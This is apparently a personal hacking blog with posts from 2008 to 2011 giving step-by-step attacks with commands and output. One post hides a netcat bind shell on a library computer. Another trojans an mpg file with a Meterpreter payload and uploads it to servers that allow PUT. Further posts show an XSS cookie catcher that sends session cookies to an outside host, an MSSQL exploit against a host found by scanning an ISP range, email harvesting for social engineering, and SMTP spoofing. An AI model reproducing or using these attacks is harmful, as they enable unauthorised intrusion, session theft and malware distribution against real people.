Hacking

Bind shell using Netcat

2011-07-08T14:48:00.001-04:00

So I did this while I was at a library, since you do not need admin rights and for I didn’t need to sit at the computer. I set up a netcat listener on port 4444 for I could connect to the computer from anywhere in the building. First I got a vb script straight from MS in order for you do not see the listener running. Create a process hidden in windows I used the script I found here.

Next I downloaded netcat for windows and created a bat script to run the command I wanted.
C:\Users\Syrus\Documents\nc\nc.exe -lvp 4444 -e cmd.exe
Next I edited the vbs script to include the batch file I made
Const HIDDEN_WINDOW = 12

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\ Users\Syrus\Documents\test.bat", null, objConfig, intProcessID)

So this pipes cmd.exe to a listener on port 4444, all I need to do is find the ip of the victim and use netcat to connect. I did this by running.
$ nc -vn 10.10.9.171 4444
Connection to 10.10.9.171 4444 port [tcp/*] succeeded!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Now I have access to the computer from pretty much anywhere in building. Have fun!

Google Enumeration

2011-06-27T11:19:00.003-04:00

Here we are going to do some Zone transfer and google enum. We found a DNS server that allows Zone transfer and we can see all the hosts a domain has. We can run port scan on these host's or use the information we obtain for a social engineering attack. On Backtrack 2 there is a python script for email enumeration using google. I posted a link to the code below. Once we get a list of emails we can do a google search on them to find out what they have registered there accounts for.

Zone transfer
host -t ns victim.com
victim.com name server ns2.**telecom.net.
victim.com name server ns1.**telecom.net

host -l victim.com ns1.**telecom.net
Using domain server:
Name: ns1.**telecom.net
Address: **.136.95.2#53
Aliases:

victim.com name server ns1.**telecom.net.
victim.com name server ns2.**telecom.net.
victim.com has address **.6.150.207
afw.victim.com has address **.132.59.39
asgshare.victim.com has address **.132.59.42
bilbo.victim.com has address **.132.59.38
cbportal.victim.com has address **.195.**.136
demo.victim.com has address **.132.59.41
dev.victim.com has address **.132.59.62
docusign.victim.com has address **.132.59.62
docusigndemo.victim.com has address **.132.59.36
dots.victim.com has address **.132.59.44
dou.victim.com has address **.132.59.49
douinfo.victim.com has address **.132.59.43
eclipse.victim.com has address **.233.172.157
stage.eclipse.victim.com has address **.89.226.67
www.eclipse.victim.com has address **.233.172.157
eclipserebound.victim.com has address **.233.172.156
files.victim.com has address **.6.150.207
ftp.victim.com has address **.132.59.38
test.ftp.victim.com has address **.132.59.38
imagenet.victim.com has address **.6.150.207
kwclnt.victim.com has address **.132.59.62
kwportal.victim.com has address **.195.**.130
kwremote.victim.com has address **.195.**.137
lists.victim.com has address **.23.51.19
localhost.victim.com has address 127.0.0.1
mail.victim.com has address **.17.147.38
mcwebview.victim.com has address **.132.59.40
pahportal.victim.com has address **.195.**.135
palms.victim.com has address **.132.59.45
partners.victim.com has address **.23.52.2
phportal.victim.com has address **.195.**.133
remaxportal.victim.com has address **.195.**.134
remaxremote.victim.com has address **.195.**.134
support.victim.com has address **.132.59.38
tam.victim.com has address **.132.59.47
testdrive.victim.com has address **.132.59.48
tssrv.victim.com has address **.195.**.131
vision.victim.com has address **.132.59.50
waldo.victim.com has address **.132.59.37

Email Harvesting
Here is the python script I used.
https://docs.google.com/document/d/1-AaKJBaIXP3uzynaTm3kpUhX3ysV8DbFz2r1r1lAR7U/edit?hl=en_US&authkey=CL217ccH
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Google Web & Group Results:
+++++++++++++++++++++++++++++++++++++++++++++++++++++

marketing@victim.com
jbotti@victim.com
JFrankel@victim.com
tfranceski@victim.com

So a little google search on the email address and see what’s up with these guys.
Example
JFrankel has a post on blackberry.com about not receiving emails through Blackberry enterprise server. The post is old but the concept stays the same this can lead to social engineering by calling saying you’re from blackberry support and can ask network topology questions.

We can also do some SMTP enumeration or send him a message on blackberry.com forum I think someone would be more prone to open a forum private message link as opposed to an email. The link can lead to somewhere we can do some cross site scripting, enable a back door, really anything.

We see the domain has a hosted email server do to the IP being in a complete different range. Do an ARIN lookup
**.252.96.3
NS ns-east.xxxxx.net

**.153.156.3
NS ns-west.xxxx.net

**.17.147.38 PTR mail.xxxxxxxxx.com

Combining Files

2011-06-23T10:04:00.001-04:00

I’m going to combine my two previous posts here and here,now for this exploit in combining files. Say you find a site vulnerable against PUT * HTTP/1.0 that has downloadable content. So I would recommend downloading a file off the server in this case for me it will be 03.mpg. I’m going to combine 03.mpg with my Metasploit Binary Payload meterpreter.exe.
We can use Windows command prompt in order to do this.
C:\ >copy /B 03.mpg + meterpreter.exe file.mpg
03.mpg
meterpreter.exe
1 file(s) copied.
The copy /B make the output a binary file. So now you can take file.mpg rename it to 03.mpg and PUT it back on the server, whenever someone downloads the file and runs it, it will spawn a meterpreter session to you. Say you do this on a porn site you can get multiple meterpreter sessions for easy exploiting.

Enjoy!

Metasploit Binary Payload

2011-06-22T14:30:00.002-04:00

Once again we are going to start off simple. We are going to use Metasploit to make a Binary Payload using a reverse tcp meterpreter session. First we are going to export Metasploit meterpreter to a file. We do this via the following command. The LHOST will be your computer’s IP address for the victim knows where to connect back to. We are going to redirect the output of the command to a file named meterpreter.exe in the root of my http server for simplicity.

[root@localhost app]# ./msfpayload windows/meterpreter/reverse_tcp LHOST= x.x.70.197 X >/var/www/html/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"10.10.13.247"}
Next we are going to give the file rw permission
[root@localhost app]# chmod 665 /var/www/html/meterpreter.exe
Now on the attacking box we need to set up a meterpreter listener.
[root@localhost app]# ./msfconsole
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 37 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 37 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.70.197
LHOST => x.x.70.197
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.70.197:4444
[*] Starting the payload handler...

Next run the executable on the victims computer (I’ll show a better way to do this later down the road).

[*]Transmitting intermediate stager for over-sized stage…(89 bytes)
[*]Sending stage (2834 bytes)
[*]Sleeping before handling stage…
[*]Uploading DLL (81931 bytes)…
[*]Upload completed.
[*]Meterpreter session 1 opened (x.x.70.197:4444 -> x.x.200.252:1227
meterpreter >

This has a lot of possibilities if you want to compromise a server you can find one that was vulnerable to my last post. Put in a file that gives you command line access to the server and run the executable on the server itself. This way, get a privileged session to the entire server as opposed to a directory if it is jailed.

Banner Grabbing

2011-06-22T10:05:00.009-04:00

In more boredom I figured I will just do something easy and simple and usually over looked. We are going to use netcat to do some http server banner grabbing.

# nc 12.200.x.x 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/html
Content-Location: http://10.1.1.120/WebInterface.htm
Last-Modified: Sat, 29 Mar 2008 16:03:16 GMT
Accept-Ranges: bytes
ETag: "569b6d66b691c81:1d8a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 22 Jun 2011 14:07:14 GMT
Connection: close

Just for the record Head requests can be spoofed.

So we connect on port 80 and issue a head request.
We have the internal IP address which here is 10.1.1.120 When I see a class A IP address for an Internal network I usually guess they are using CIDR. Since the rule of thumb is not to have more then 500 hosts per subnet. So I'm guessing 10.1.1.0/24

Next It tells us they are using IIS6 which is either Server 2003 or XPx64

Next we will see what options are available to us. By using.

Options / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Date: Wed, 22 Jun 2011 14:15:15 GMT
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

From here we can see what commands are available to us and PUT is available I believe this is a very underutilized method. So next we can put a file up be it malicious what not. Here is my file.

# cat 1.txt
blah

So next you have to see how big the file is.
#wc -m 1.txt
5 1.txt(5bytes)

#nc 12.200.x.x 80
PUT /1.txt HTTP/1.0
Content-type: text/html
Content-length: 5

Some servers will give you a status message and some will not.

Just for examples of what you can do, you can make a php script to run commands and through this you can change root/admin passwords if there are multiple services on the computer lets say rdp or ssh you can get an actual session on the victim. This is an old exploit but it is still valid today against miss configured servers and in my opinion should not be over looked.

Remote shares

2010-06-18T11:22:00.002-04:00

I came across this googling for exploits and It's really good for Recon. It uses port 139. So you need to find the Netbios name of the target computer, Microsoft makes this very easy. Once you find a target with 139 open issue the following command.

$nmblookup -A 12.***.58.154

The -A switch signifys a remote host. You will get some out put among the lines of.

Looking up status of 12.***.58.154
BROOKS <00> - M
ARROWSIGN <00> - M
BROOKS <20> - M
ARROWSIGN <1e> - M

MAC Address = 00-C0-A8-83-19-5D

So now we have a Netbios name "BROOKS" So to follow this up we are going to do the following command.

$smbclient -LBROOKS -I 12.***.58.154
Password:
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
SharedDocs Disk
print$ Disk Printer Drivers
ADMIN$ Disk Remote Admin
C$ Disk Default share
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------

I just hit return for the password and it shows a list of shares on that machine, c$ is my favorite share thats why I posted this example you can have access to the whole C:\ Drive with the c$ share you can set a payload to startup on logon etc..

Like I said before I just use this technique for information gathering for a future attach. I'll show you another example of some information you can get from this.

$ smbclient -LWEBSERVER -I 12.***.54.11
Password:
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------
ARAMIREZ
BUFFY Buffy Computer
BUSINESSSERVER
CHOFFMAN2
CHOFFMANN Cindy Hoffmann
CPELL
CSANTOYO
DESTINEYELELAB1
DESTINEYELEMLAB
DMUNOZ
ELEMPRINCIPAL IBM 2003_25
ELEMRECEP IBM2003_#29
ELEM_LIBRARY
EMATA
FAMNET
FESERVER
IPORTILLO
KIMPELL2 Dianne Kimpell
LMIRANDA
LORETTO2
LORETTO2A
MATA
NNIETO Teacher Computer
PHERRERA2 Patty Herrera
POLIVAS Patso Olivas
PRYHERD Teacher Computer
PS-55DAE6
RECORDS
RENRIQUEZ
SASI
SPACE
SVR-APP02
SVR-PDC
TEC2
WEBSERVER

Workgroup Master
--------- -------
101 TEACHER101
LORETTO SVR-PDC
WORKGROUP SPAREIBM

This tells you pretty much all the computers on the network, It tells you the domain and other trusted domains and It can also tell you the DC or GC server, very useful information gathering, it's essentially a map of someones LAN.

Enjoy
-Syrus

SSH Tunnel

2009-12-29T10:22:00.002-05:00

I figured I will do a quick post on SSH Tunnel. I will be tunneling to the wcosug server using putty. I configure tunnels on putty as such

Then I configure my web browser to use it as a proxy.

Any viola an SSH tunnel. In the future I will go into more about using it as say a RDP tunnel and etc...

Cisco DTP Hack

2009-12-23T08:58:00.002-05:00

Well unfortunate I wasn't able to get this to work. I will try again over Christmas I was not able to pick up any DTP packets. I'm going to have to do more research on it.

Configure Cisco Router

2009-12-22T08:56:00.003-05:00

Well this is going to be a two part hack. I configured a cisco switch for 3 diffrent VlAN's I'll be using 2 of the VLAN's please look at the config for any questions this is on a Catalyst 3500 XL switch.

Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.

Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.

Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing

Switch(config)#interface
% Incomplete command.

Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an
interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit
(MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a
receive-only
interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and
ignore global
UDLD setting

Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp
status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5
0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- ---------
--------------------------
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,

1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,

2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.

Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.

Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#

DNS Zone Transfer

2009-12-21T09:58:00.003-05:00

DNS Zone transfer is when a DNS server is incorrectly configured to allow any one to ask for a DNS list of a certain domain. I wanted to find a specific example of a Zone transfer that had internal IP's on the transfer after nmaping ranges for port 53 I found one. Now you need to know the domain name in order to do the transfer and not a lot of people have Reverse DNS so I got lucky finding one that had both port 53 and 25 open. To find the name I telnet to port 25 and do a Helo request, on this one I did not need to do a Helo

C:\Users\Syrus>telnet **.192.22.105 25
220 rack1.*********.com ESMTP Postfix

Now to do the zone transfer the syntax is host -l domain name ip address or dns name of DNS server

bt ~ # host -l *********.com **.192.22.105
Using domain server:
Name: **.192.22.105
Address: **.192.22.105#53
Aliases:
*********.com has address **.192.22.105
*********.com name server ns1.*********.com.
internal.*********.com has address 192.168.60.254
internal2.*********.com has address 192.168.60.254
isc.*********.com has address **.203.105.185
isc-pi.*********.com has address **.203.105.185
mail.*********.com has address **.192.22.105
new.*********.com has address **.192.22.105
ns1.*********.com has address **.192.22.105
ns2.*********.com has address **.192.22.106
rack1.*********.com has address **.192.22.105
rack2.*********.com has address **.192.22.106
rack3.*********.com has address **.192.22.107
rack4.*********.com has address **.192.22.108
rack5.*********.com has address **.192.22.109
smtp.*********.com has address **.192.22.105

You have a good network map with some internal IP's go find some more that are vulnerable against Zone transfers.

SMTP Spoofing

2009-12-21T09:40:00.003-05:00

This is an old exploit I guess you would call it. It is not available in wide use but I was playing with it over the weekend and I figured I would post it.

C:\Users\Syrus>telnet mail.*******.com 2525

220 smtp.*******.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 21 Dec 2009 09:49:36 -0500
HELO
250 smtp.*******.com Hello [10.10.10.100]
MAIL FROM: user@*******.com
250 2.1.0 user@*******.com....Sender OK
RCPT TO: *******@gmail.com
250 2.1.5 *******@gmail.com
DATA
354 Start mail input; end with .
Here is my email message.

.
250 2.6.0 Queued mail for delivery

And Viola email sent from email address with no password or anything. Very Useful!

XSS

2009-12-21T09:02:00.003-05:00

Well I was testing my friends site for vulnerability and I found it was vulnerable to Cross Site Scripting. The environment I used it on was php forum. The first thing I needed to do was to see if the forum allowed user to run scripts to do this I made a new thread with the script
< script> alert("Do you work")</script>
in it. And well it worked! So the next step I made was to see if it was cookie based so in the url I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. So now you need a cookie catcher. It's a simple php script
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.*******.com");
?>
So upload your php script to a php supported webhosting site. I used t35. Now you are going to make an iframe. You are going to want it small as possible for its not seen so I set height width and boarder to 0 you also want to set the document location to the location of your cookie catcher
< iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie) </iframe >

Now when a user who is logged in browses to your thread you will catch his cookies in a document called cookie.html here is what the cookies looked like that I caught from my friends site
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someones cookies what do you do? Well first make sure you are logged out of the site. So now you inject there cookies into your browser you do this by typing the following in the URL
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hitting enter then refresh and you should be logged in as the user.A reason why this would not work is if the cookies are IP based meaning you need to have a certain IP in order to use those cookies.

It's been a while

2009-12-21T08:18:00.000-05:00

Well it has been a while I hope to be able to do weekly updates today I will hopefully get to new exploits up. I saw I have some comments I will try to respond to them today as well thanks for all the support!

MSSQL Exploit

2008-07-28T11:35:00.000-04:00

The following exploit is for Microsoft SQL Server.

Requirements
Metasploit framework
NMap

Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port. While 1434 is a UDP (User Defined Protocol) port. For NMap we will be using a SYN Scan a SYN scan is pretty much like playing ding dong ditch. A regular protocol requires a three way hand shake. A SYN scan initiates the hand shake waits for a reply then leaves. Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”

First step is to find a vulnerable host to do this we will be looking for a host that has port 1434 open. When I scan hosts with NMap I always give it a range for I have a better chance of getting a hit. I also have the command output the results to a file for I have them on record and they are easier to search.

#nmap –sU –p1434 –P0 –sS 24.151.0.0/16 >>/home/user/1434.txt

-sU UDP scan
-p What port to scan in this case 1434
-P0 Don’t ping host first
-sS SYN scan this is for TCP but I’m in the habit of always using it
IP The IP address 24.151.0.0
/ Subnet suffix in this case 16=255.255.0.0
>> Where the output file is going to be located

The scan is going to take a while we are scanning 65,025 hosts. When the scan is done or 30min feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s

So now that we found a potential box for attack we try to hack it. I will be using Metasploit 2 console for this attack, Metasploit 3, gui and web interface will all work as well.

#msfconsole
[*] Starting the Metasploit Framework...

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 1434 The target port

Payload: Name Default Description
-------- -------- ------------------------------------------- ----------------------
--------------------
required EXITFUNC process Exit technique: "proce
ss", "thread", "seh"
required METDLL /home/framework/data/meterpreter/metsrv.dll The full path the mete
rpreter server dll
required LPORT 4444 Listening port for bin
d shell

Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >

msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76

msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use –m Process
loadlib: Loading library from ‘ext227496.dll’ on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute –f cmd –c
execute: Executing ‘cmd’…
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
meterpreter>
interact: Starter interactive channel 1.

Microsfor Windows 2000 {Version 5.00.2195
© Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

When you get to the shell you can do a whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, that means you have Administrator rights. Now your imagination is the limit.

By,
Syrus

Isolate IP

2008-07-24T11:34:00.000-04:00

Ettercap has a plug in to isolate network IP address. In a sense it causes a DOS attack. This can be useful for network administrators. For example unlike cisco where you can shutdown an interface on a switch, sonicwall wont let you do such a thing; which can make administering a good amount harder. Especially when you have end users running itunes and torrents etc.
To start this attack you will need the IP of the host you are isolating. In this case it will be 192.168.2.3. How this attack works every packet the computer sends out will resolver its own mac address. Here is the network setup of a windows box using ipconifg /all.

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : NVIDIA nForce Networking Controller
Physical Address. . . . . . . . . : 00-11-D8-70-48-4F
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Primary WINS Server . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : Thursday, July 24, 2008 11:42:50 AM
Lease Expires . . . . . . . . . . : Thursday, July 24, 2008 11:52:50 AM

Here is the arp -a out put
Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-06-b1-36-1f-24 dynamic

To start the attack we are going to be using the isolate plugin. And specify the IP that we are attacking. Here is what the command looks like.

#ettercap -i sk0 -P isolate /192.168.2.3/ //

The command will take about 5 min to go into effect since that is how long it takes the arp cache to refresh, once it does this is what the ap should look like.

Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-11-D8-70-48-4F dynamic

As you notice that is'nt the same mac address that 192.168.2.1 had when we first ran the arp -a, it is now resolving the mac address of itself. If you try to resolve a web site the ettercap will output something along the lines of this.

TCP 192.168.2.3:80 --> 127.0.0.1:80 | AP

tsgrinder

2008-07-22T12:33:00.001-04:00

TSGrinder is a terminal server Brute Force tool. It uses dictionary attacks and has a very useful leet function. Given the leet file and dict file are weak to start with but that is easily remedied. If you run the command you will get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator'
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The example demonstrates very well how to use this program. So for this example I will be attacking my server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password, it will output success and log off of mstsc. Since the dict file is weak, I recommend googling for a world list file. This will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to edit this by adding some more such as:
a @
o 0
